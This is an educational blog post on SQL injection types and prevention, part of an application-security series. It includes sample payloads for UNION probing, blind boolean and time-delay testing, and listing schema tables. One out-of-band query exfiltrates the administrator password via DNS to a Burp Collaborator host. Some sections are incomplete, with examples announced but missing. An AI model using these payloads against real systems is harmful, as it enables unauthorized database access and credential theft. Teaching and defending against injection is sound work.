Jul 14th, 2021
The Ultimate Guide to SQL Injection [AppSec Blog Series Part 4]
SQL injection is malicious SQL queries by exploiting application vulnerabilities. Additionally, SQL injection is a code injection technique that can be getting important information from your database. SQLi can go as far as destroying your database. The following things could be done with SQLi:
- An SQL Injection vulnerability could allow the attacker to gain full access to the database server.
- SQL injection also could allow changing the data in the database. For instance, an attacker could use SQL Injection to change balances or transfer money to their account in a financial application.
- SQLi can be used to delete records and deleting data can affect application accessibility until the database is restored.
- An operating system can be accessed using a database server on some database servers.
An application is vulnerable if:
- The data provided by the user is not verified, filtered, or sterilized by the application.
- Dynamic queries or non-parameterized functions executed with no context-sensitive escaping are used straight in the interpreter.
- Dangerous data is used in the object-relational mapping (ORM) search parameters to get valuable, important records.
The basis of a code injection vulnerability is the lack of validation and sanitization of the data used by the web application. This vulnerability could be existing on almost any type of technology related to websites. Anything that accepts parameters as input can potentially be vulnerable to an injection attack.
In our AppSec blog series [Part 3], we talked about OWASP Top 10. In correlation to OWASP Top10, in this blog post, we will be talking about A1 - Injection in detail.
- A1 – Injection
- A2 – Broken Authentication
- A3 – Sensitive Data Exposure
- A4 – XML External Entities (XXE)
- A5 – Broken Access Control
- A6 – Security Misconfiguration
- A7 – Cross-Site Scripting (XSS)
- A8 – Insecure Deserialization
- A9 – Using Components with Known Vulnerabilities
- A10 – Insufficient Logging & Monitoring
Types of SQLi
We can classify SQL injection types based on the methods they use to access backend data and their damage potential.
SQL injections are generally divided into the following categories: In-band SQLi (Classic), Inferential SQLi (Blind), and Out-of-band SQLi. We can classify SQL injection types based on the methods they use to access backend data and their damage potential.
SQL injection is a code injection technique that can be getting important information from your database. SQLi can go as far as destroying your database.
1. In-band SQLi
In-band SQL Injection occurs when an attacker can use the same communication channel to launch the attack and gather results.
a. Error based
Error-based injections give insight into the database. These errors can be helpful to developers and network administrators but must be restricted on the application side.
Example: If the server responds to this URL with an SQL error, it shows the server has connected to the database in an insecure way. After this step, some of the SQL commands can be run to tamper or destroy the database.
It is a type of injection that combines the results of two or more SELECT statements into a single result using the UNION operator to get more information from the database.
Example: The below example shows an attacker can get the number of columns using this type of injection attack.
https://example.com/category.php?id=3 'UNION+SELECT+ NULL,NULL,NULL--
2. Out-of-band SQLi
Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results. The database server can send data to an attacker with the ability to make DNS or HTTP requests.
Suppose that the application's response does not depend on whether the query returns any data, or whether a database error occurs, or the time taken to execute the query. We can trigger out-of-band network interactions for this application that we control. These can be triggered conditionally, depending on an injected condition, to infer information one bit at a time. Moreover, various network protocols can be used to leak data from network interactions. The visual here shows that the query was sent to the application's database via the web application. At that time, the listening server on the network captures information of some DNS and HTTP interactions of database out band requests. We can use Burp Collaborator while using out-of-band techniques. Burp Collaborator allows you to detect when network interactions occur because of sending individual payloads to a vulnerable application and lists the DNS, HTTP Protocols interactions. Burp Collaborator is built into Burp Suite. The techniques for triggering a DNS query are highly specific to the type of database being used. For example, the query used in the next example triggers the target MySQL database.
Example: DNS Based Exfiltration
- SELECT+password+FROM+users+WHERE+username%3d'administrator INTO OUTFILE '\\ qwqdu0hle7fue507e75dfaenler4ft.burpcollaborator.net\a'
OOB SQL injection data could exfiltration from an outbound channel using DNS or HTTP protocol. In this example, the DNS protocol was used, and the Burp Collaborator server is used to listening and capturing outbound requests initiated from the database system. This query was created thinking of the target database is MySQL. This query reads the password for the Administrator user, appends a Collaborator subdomain, and triggers a DNS lookup. The DNS lookup result will be like the following, we could see the password that belongs to the administrator.
The following items may cause to use OOB injection:
- Lack of input validation in web applications.
- Target database in a network environment that allows sending outgoing requests (DNS, HTTP) without security restrictions.
- Sufficient privileges to initiate an outbound request.
- The following methods can be used to prevent OOB SQLi:
- Input validation for client and server-side.
- Proper error handling to avoid displaying detailed error information.
- Review network and security architecture design.
- Assigning the database account based on the least privilege principle.
- Implementation of Web Application Firewall (WAF) and Intrusion Prevention System (IPS) for security control.
- Continuous monitoring for anomaly and proper incident response processes as the safety net of the controls.
3. Inferential SQLi (Blind SQLi)
In the Inferential SQLi attack, the attacker cannot see the results because the web application database is not transmitting the data. For this reason, the attacker sends queries and tries to build the structure of the database by observing the web application's response and the behavior of the database.
This technique forces different responses to get from the application, depending on whether the query returns correct or incorrect results by sending queries to the database.
Example: As in the first query, we can estimate the length of the database with Boolean expressions based on the answers returned from the database. And of course, we can even find out its name by furthering a query like this. With a query like in the second example, we can ensure that all items in the x category are displayed from the database.
http://www.example.com/?id=1' AND (length(database())) = 8 --+
http://example.com/categoryx.php?id=1 OR 17–7=10
This technique forces the database to wait for a while before responding after the query is submitted.
Example: With this technique, we can query whether the user is a system admin from the returned response time using a time-based query with a conditional query as in the first example. Or we can determine that the database type is MySQL from the slowness of the response time returned by using an example such as the second query and a query such as if the database version is equal to MYSQL 5.
- SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:15’
- SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)
Simple SQL Injection Example
SQL injection usually occurs when you ask a user for input, like their username/user ID, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database.
Look at the following example which creates a SELECT statement by adding a variable (txtUserId) to a select string. The variable is fetched from user input (getRequestString):
Real-Life SQL Injection Attack Examples
Over the past 20 years, many SQL injection attacks have targeted large websites, businesses, and social media platforms. Some of these attacks led to serious data breaches. A few notable examples are listed below:
Assume that there is a comment system that works for many platforms such as WordPress, Tumblr, and Blogger.
On this platform, we can host our sites on the dashboard, and when we navigate to our site, the ID value of the site returns on the URL.
Assume that our site has a vulnerable URL with our ID. With the following query, we can provide full database access that holds private users.
The query for getting database version:
The query for getting all tables in the database:
https://example.com/examplecomment/$MySiteIdunionselect1,2,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_schema=DATABASE()%23
Suppose that an application has a SQL Injection vulnerability on the API endpoint and on the input that takes a parameter.
We can detect this vulnerability by triggering a time delay then observing the response time with the payloads such as the following payload.
- 1111' waitfor delay '00:00:20'--
Then we can go further, such as getting database users with the help of the tools used for exploitation.
Impact of SQL Injection Attacks
The attacker injects a malicious query into the web application’s vulnerable entry point. The form, HTTP header, or session ID could be vulnerable. So, the attacker can use these security vulnerabilities. For instance, the web application could be commercial, financial, related to banking, etc. In this way, the attacker could access confidential information related to the content of the web application.
Assume that the web application is related to banking and the attacker is the administrator. In this case, the attacker can access the customer account information from the bank database with a malicious query. This can cause critical damage to a bank.
If the attack is successful, the following situations can occur:
- Stealing credentials: SQL injections can be used to obtain users’ credentials. Attackers can access their privileges then pose as these users.
- Accessing database: Attackers can use SQL injections to reach information stored in a database server.
- Altering data: Attackers can use SQL injections to modify or destroy the accessed database.
- Accessing networks: Attackers can use SQL injections to access database servers with operating system privileges. Then, the attacker can try to access the network.
How to Prevent Injection?
SQL Injection vulnerabilities can be prohibited with special prevention techniques according to the subtype of SQLi vulnerability, SQL database engine, and programming language. However, the general principles you can follow to keep your web application secure are as follows:
- Option 1: Using Prepared Statements
- Option 2: Using Stored Procedures
- Option 3: Using Whitelist for Inputs
- Option 4: Not Using User Inputs
- Option 1: Using Least Privilege
- Option 2: Performing Whitelist Input Validation
In this article, we have explained what SQL injection is and the different types of SQL injection. In the next blog posts, we will be talking about detailed examples of SQL injection types.
If you liked this post, share it now!